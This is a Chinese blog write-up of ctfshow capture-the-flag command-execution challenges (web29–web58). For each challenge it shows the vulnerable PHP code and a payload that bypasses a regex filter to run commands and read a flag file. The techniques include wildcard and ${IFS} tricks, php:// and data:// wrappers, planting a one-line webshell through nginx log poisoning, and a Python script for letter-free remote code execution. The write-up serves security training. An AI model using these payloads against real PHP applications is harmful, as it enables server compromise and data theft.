ctfshow命令执行(web29-web56)第一部分

已于 2022-12-26 13:39:36 修改
阅读量1.6k 收藏 9
点赞数
分类专栏: 刷题 文章标签: php 开发语言
于 2022-10-05 11:15:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63928796/article/details/127156424
版权

web29

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤了flag可以用*或者?绕过

payload:c=system('cat fla*');

web30

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤了flag,system和php其中flag和php可以用通配符绕过,system函数可以用其他函数代替system(),exec(),passthru()

payload:?c=passthru('cat fla*.ph*');

web31 

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤的挺多我们利用eval的嵌套执行

?c=eval($_GET[1]);&1=system('tac flag.php');

 web32

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

 没有过滤eval可以用上一题同样的方法,但过滤了;可以用?>代替,而且过滤了()所以不能用eval方法,可以用include配合伪协议来读取flag

?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

web33

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

相同payload

?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

 web34

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

相同payload

?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

 web35

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

相同payload

?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

web36

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

 过滤了数字,把1换成a即可

?c=include$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php

web37

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

include函数文件包含用伪协议。data伪协议

?c=data://text/plain,<?php system("tac f*");

web38 

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

可以用日志包含

首先在User Agent处写下一句话<?php eval($_GET[1]);?>,执行。

然后这个一句话木马会存在日志文件中,我们再传c=/var/log/nginx/access.log,实现包含日志文件,包含会将日志文件中的php代码执行,从而达到getshell的目的。

payload:

?c=/var/log/nginx/access.log&1=system('tac flag.php');

也可以用base64的data伪协议

c=data://text/palin;base64,PD9waHAgc3lzdGVtKCJubCBmbGEqIik7Pz4=

 web39

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

data://text/plain相当于执行了php语句而.php由于前面的语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,就不在起作用了

?c=data://text/plain,<?php system("nl fla*")?>

web40 

 <?php
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}

基本所有的符号都被过滤了

localeconv():返回一包含本地数字及货币格式信息的数组。其中数组中的第一个为点号(.)
pos():返回数组中的当前元素的值。
array_reverse():数组逆序
scandir():获取目录下的文件
next(): 函数将内部指针指向数组中的下一个元素,并输出。

 scandir(.)可以获取当前目录

pos(localeconv())就是.

print_r(scandir(pos(localeconv())));就可以获取当前目录

可以得到flag.php位于数组的第三个值里,也就是倒数第二个,我们可以通过array_reverse()函数以相反的元素顺序返回数组,在用next()函数读取下一个元素,最后通过highlight_file()函数读取到flag.php

?c=highlight_file(next(array_reverse(scandir(current(localeconv())))));

 web41

<?php
if(isset($_POST['c'])){
    $c = $_POST['c'];
if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
        eval("echo($c);");
    }
}else{
    highlight_file(__FILE__);
}
?>

web42

if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}

我们先来理解一下这个/dev/null  2>&1

Linux环境中所有的内容都是以文件的形式存在的,/dev/null是将输出结果输入到null,相当于黑洞里面。

1,2是文件描述符:

0代表的是标准输入,1代表的是标准输出,2代表的是错误输出。

这个东西一整个的意思是把错误输出也在标准输出里面输出,然后统一输出到null,即黑洞里面,所以这个是没有返回结果的。

这样子我们可以采取截断的方式,用%0a换行,让它只执行我们可控的命令。 

?c=tac flag.php%0a

?c=tac flag.php%26

?c=tac flag.php||

或者采取另一种方式,用;当成两条命令来执行。

payload:

?c=tac flag.php;ls

web43

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

和web42payload相同

web44

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

过滤了flag用通配符,将上上一个payload的flag改为fla*即可

web45

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| /i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

多过滤了空格用%20、%3c、${IFS}、$IFS$9等代替

?c=tac${IFS}fla*.php%0a

web46 

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

 空格用<代替将flag用\隔开

?c=tac<fla\g.php%0a

web47

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

与上一个payload相同

?c=tac<fla\g.php%0a

web48

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

与上一个payload相同

?c=tac<fla\g.php%0a

web49

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

与上一个payload相同

?c=tac<fla\g.php%0a

web50


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

与上一个payload相同

?c=tac<fla\g.php%0a

 web51

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

tac不能用了换成nl

?c=nl<fla\g.php||

web52 

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

和上题一样

c=nl<fla''g.php||

c=nl<fla\g.php||

web53 


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        echo($c);
        $d = system($c);
        echo "<br>".$d;
    }else{
        echo 'no';
    }
}else{
    highlight_file(__FILE__);
}

d=system($c)可以执行c=ls发现成功执行,可以构造payload

?c=ca''t${IFS}fla?.php

web54 

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

使用通配符进行过滤了,就不用上面的命令了,可以使用mv,将flag.php移动到1.txt,之后便可以直接去访问1.txt。

c=mv${IFS}fla?.php${IFS}1.txt

web55 

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

 无字母的rce,看了下不太懂先放一下脚本

无字母数字的命令执行(ctfshow web入门 55)_Firebasky的博客-CSDN博客

import requests

while True:
    url = "http://1d96ce0e-d707-448a-a372-5dfdd5faa086.challenge.ctf.show/?c=.+/???/????????[@-[]"
    r = requests.post(url, files={"file": ('1.php', b'cat flag.php')})
    if r.text.find("flag") >0:
        print(r.text)
        break

web56 

// 你们在炫技吗?
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

和上面相同的脚本

web57

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-08 01:02:56
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

// 还能炫的动吗?
//flag in 36.php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
        system("cat ".$c.".php");
    }
}else{
    highlight_file(__FILE__);
}

 $(())------是-1
$((~37))------是36
所以我们只需要保证中间是-37即可,
$((~$(())$(())))---是1
所以
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))
代表36,即可获取flag

web58

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

c=highlight_file('flag.php');

 

Msaerati
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow 命令执行 web56
Kradress的博客
12-07 960
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_GET[
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
CTFshow web入门 56
li_n_k的博客
11-15 395
零基础小白
2024年网安最全ctfshow-web-命令执行
最新发布
2401_84264610的博客
05-01 37
①直接执行系统命令???”);???②内敛执行??c=echo;③利用参数输入+eval?④利用参数输入+include+伪协议(不用括号、分号)?2. web30过滤php、flag、system补充打印文件命令?c=echo%20;3. web31其他的过滤了无所谓,但过滤了.和空格①其实就是highlight_file(flag.php);的url编码,适用php7?c=(
CTFshow web入门---web56
qq_53099119的博客
11-13 1344
在P神文章>深入理解glob通配符
CTFshow web56 57 58 59 60-65
ChenD的学习笔记
11-12 896
CTFshow web56 web57 web58 web59 web60 web61 web62 web63 web64 web65
ctfshow-web入门56(再次理解无数字字母rce)
qq_44657899的博客
10-18 1655
前言 之前做过一道红包题第二弹,这里也是同样的解法,但是新学到了很多知识点,记录一下。 这个解法,p神的文章讲的很清楚无字母数字webshell之提高篇 文章目录前言glob通配符. 执行文件不需要x权限题解 glob通配符 因为只有PHP生成的临时文件包含大写字母,所以可以用/???/????????[@-[]来匹配我们上传的临时文件。 原理: 翻开ascii码表,可见大写字母位于@与[之间: 那么,我们可以利用[@-[]来表示大写字母: . 执行文件不需要x权限 题解 注意传参方式为POST。
ctfshow-VIP题目-Web-详细解题思路
01-27
cookie泄露:根据题目提示,用burp抓包,查看cookie,发现flag,flag:ctfshow{f1d3941b-a3a7-4ff0-aae1-18d917299635}。 域名txt记录泄露:可以使用以下网站:在线域名解析记录检测-在线Nslookup域名解析查询工具 ...
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow-web入门55和56
m0_73303597的博客
01-01 365
自用
ctfshow web入门55,56
xiaolong22333的博客
11-03 1411
最近在做这系列的题,这两题又学到了新姿势,赶紧记录一下 web55 <?php // 你们在炫技吗? if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } }else{ highlight_file(__FILE__); } 过滤了字母,不过通配符?和数字没有过滤,可以用bin
CTFshow web入门 web56~web70 命令执行
qq_56815564的博客
04-18 583
这回倒好,直接告诉你不能用highlight_file()了,根据上面一堆题目的源码,可以明确的一点就是else里的那个highlight_file()被禁用的原因才导致的报错,即不能使用highlight_file()事先说明一下,eval函数的作用是获取返回值,所以传入导eval的数据需要是一个有返回值的函数,要不就是一段小程序也行。再次发现根目录下的,flag.txt,直接进得到。
CTF 总结02:preg_match()绕过
热门推荐
weixin_42789937的博客
01-18 1万+
preg_match()绕过,小白总结,修改过一次,后期会根据做题经历有所增补~
正则表达式题目(ctf题)
weixin_60777183的博客
08-30 1157
题目: <?php $key='flag{********************************}'; $Regular=preg_match("/zkaq.*key.{2,9}:\/.*\/(key*key)/i",trim($_GET["id"]),$match); if($Regular){ die('key:'.$key); } 解答: key里面有想要的Flag,要得到key需要$Regular大于0,$Regular变量用了”preg_...
正则
ctf_htj的专栏
12-20 828
正则 一 VI如何使用正则表达式 使用正则表达式的命令最常见的就是/ (搜索)命令。其格式如下: /正则表达式 另一个很有用的命令就是 :s(替换)命令,将第一个//之间的正则表达式替换成第二个//之间的字符串。 :s/正则表达式/替换字符串/选项 二、元字符 元字符是具有特殊意义的字符。使用元字符可以表达任意字符、行首、行 尾、某几个字符等意义。 元字符一览
【ctfshow】命令执行->web45-57
m0_55400802的博客
04-20 351
争取今天写完。
ctfshow php特性 下
weixin_63231007的博客
06-13 1309
web113 function filter($file){ if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){ die('hacker!'); }else{ return $file; } } $file=$_GET['file']; if(! is_file($file)){ highlight_file(filter($f
ctfshow web入门命令执行
09-05
在CTFweb入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用提供的信息,可以看到一些常见的双写绕过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值